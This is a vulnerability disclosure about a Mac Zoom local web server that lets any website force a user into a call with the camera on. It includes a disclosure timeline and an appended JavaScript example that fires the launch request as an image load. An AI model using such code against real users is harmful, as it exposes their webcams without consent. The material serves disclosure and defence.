Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!


A vulnerability in the Mac Zoom Client allows any malicious website to enable your camera without your permission. The flaw potentially exposes up to 750,000 companies around the world that use Zoom to conduct day-to-day business.

Jonathan Leitschuh
  • DoS Vulnerability — Fixed in Client version 4.4.2 — CVE-REQUESTED
  • Information Disclosure (Webcam) — Unpatched — CVE-REQUESTED

This vulnerability allows any website to forcibly join a user to a Zoom call, with their video camera activated, without the user’s permission.

Yep, no joke.

Disclosure Timeline
  • Mar 8, 2019 — Requested security contact via Twitter (no response).
  • Mar 26, 2019 — Contacted Zoom Inc via email with 90-day public disclosure deadline. Offered a “quick fix” solution.
  • Mar 27, 2019
    – Requested confirmation of reception.
    – Informed that Zoom Security Engineer was Out of Office.
    – Was offered, and declined, a financial bounty for the report, because Zoom’s bounty policy would not allow public disclosure even after the vulnerability was patched.
  • Apr 1, 2019 — Requested confirmation of vulnerability.
  • Apr 5, 2019 — Response from Zoom Security Engineer confirming and discussing severity. Settled on CVSSv3 score of 5.2/10.
  • Apr 10, 2019 — Vulnerability disclosed to Chromium security team.
  • Apr 18, 2019 — Updated Zoom with the suggestion from Chromium team.
  • Apr 19, 2019 — Vulnerability disclosed to Mozilla Firefox security team.
  • Apr 26, 2019 — Video call with Mozilla and Zoom Security Teams
    Disclosed details of impending DNS expiration.
  • June 7, 2019 — Email from Zoom about a video call to discuss fix.
  • June 11, 2019 — Video call with Zoom Security team about impending disclosure. Discussed how Zoom’s planned patch was incomplete.
  • June 20, 2019 — Contacted about having another video call with Zoom Security Team. Declined by me due to calendar conflicts.
  • June 21, 2019 — Zoom reports vulnerability was fixed.
  • June 24, 2019 — 90-day public disclosure deadline ends. Vulnerability confirmed fixed with ‘quick fix’ solution.
  • July 7, 2019 — Regression in the fix causes the video camera vulnerability to work again.
  • July 8, 2019
    – Regression fixed.
    – Workaround discovered & disclosed.
    – Public Disclosure.

On Mac, if you have ever installed Zoom, there is a web server on your local machine running on port 19421. You can confirm this server is present by running lsof -i :19421 in your terminal.

Here’s the code on the Zoom site that tipped me off to this localhost server (the code screenshot is not reproduced in this copy).

Figure: Browser console logs when visiting https://zoom.us/j/492468757. The two numbers logged are the pixel dimensions of the image returned by the local web server: the Zoom page loads a URL on the localhost server as an image and reads the size of the image that comes back, which is how an ordinary web page can send a GET request to the local server and get an answer from it without a cross-origin request.

The Video Call Vulnerability

I created a personal meeting with a different account, cracked open Postman, and started stripping parameters from the request to find the minimal GET request that would still launch a Zoom meeting. The only parameter that turned out to be required was:

  • confno=[whatever the conference number is]

The above-described behavior continues to work to this day! You can still use this exploit to launch someone into a call without their permission.
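The two pieces of the attack described above, as an added example in JavaScript (this is not code from the original post or from Zoom): a page issues the GET request to the local server by loading the URL as an image and reads back only the pixel dimensions of the response, and the parameter-stripping loop the author ran by hand in Postman is done in code against a simulated server. Only port 19421, the meeting number 492468757 and the confno parameter come from the post; the /launch path, the action parameter, the full starting parameter set and the oracle that stands in for the real server are assumptions constructed for this example.

```javascript
// Added example, not code from the original post or from Zoom.
// Port 19421 and the "confno" parameter come from the post; the "/launch" path,
// the "action" parameter and the other parameters are ASSUMED for illustration.

const LOCAL_ZOOM_ORIGIN = "http://localhost:19421"; // port named in the post

// Build the GET URL a malicious page would fire at the local server.
function buildLaunchUrl(params) {
  const qs = new URLSearchParams(params).toString(); // percent-encodes values
  return `${LOCAL_ZOOM_ORIGIN}/launch?${qs}`;       // "/launch" is an assumed path
}

// Browser-only: send the GET by loading the URL as an image. No CORS preflight,
// no cookies needed, and the calling page never sees the response body; the
// width/height of whatever image comes back is the whole "API response".
// Resolves with {status: "no-dom"} when run outside a browser (e.g. Node).
function probeViaImage(url, timeoutMs = 3000) {
  return new Promise((resolve) => {
    if (typeof Image === "undefined") {
      resolve({ status: "no-dom" });
      return;
    }
    const img = new Image();
    const timer = setTimeout(() => resolve({ status: "timeout" }), timeoutMs);
    img.onload = () => {
      clearTimeout(timer);
      resolve({ status: "ok", width: img.naturalWidth, height: img.naturalHeight });
    };
    img.onerror = () => {
      clearTimeout(timer);
      resolve({ status: "error" });
    };
    img.src = url; // this is the moment the local server receives the GET
  });
}

// Greedy minimisation of a request: drop one parameter at a time and keep it
// dropped as long as the oracle (does the meeting still launch?) says yes.
// This is the Postman procedure from the post, automated.
function minimizeParams(params, stillWorks) {
  const current = { ...params };
  for (const key of Object.keys(params)) {
    const { [key]: _dropped, ...without } = current;
    if (stillWorks(without)) {
      delete current[key];
    }
  }
  return current;
}

// Constructed stand-in for the real local server (assumption, not observed
// behaviour): the meeting launches iff a numeric confno is present, which is
// the outcome the author reports.
function simulatedZoomLaunches(params) {
  return typeof params.confno === "string" && /^\d+$/.test(params.confno);
}

// Constructed starting parameter set (not captured traffic). The meeting
// number is the one from the post; the other keys are made up.
const FULL_PARAMS = {
  action: "join",
  confno: "492468757",
  uname: "guest",
  pwd: "",
  browser: "chrome",
};

// Run the minimisation and return the surviving parameters and the resulting URL.
function demo() {
  const minimal = minimizeParams(FULL_PARAMS, simulatedZoomLaunches);
  return { minimal, url: buildLaunchUrl(minimal) };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo()));
}
```

The point of the image trick is that it needs nothing from the user: a third-party page can set an img src to the localhost URL exactly as zoom.us does, and nothing in the exchange ties the request to the Zoom site, which is why "any website" in the sentence above is literal. To observe it in a browser, call probeViaImage(buildLaunchUrl({ confno: "..." })) from a page's console with the Zoom client installed; in Node the probe reports "no-dom" and only the minimisation runs.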
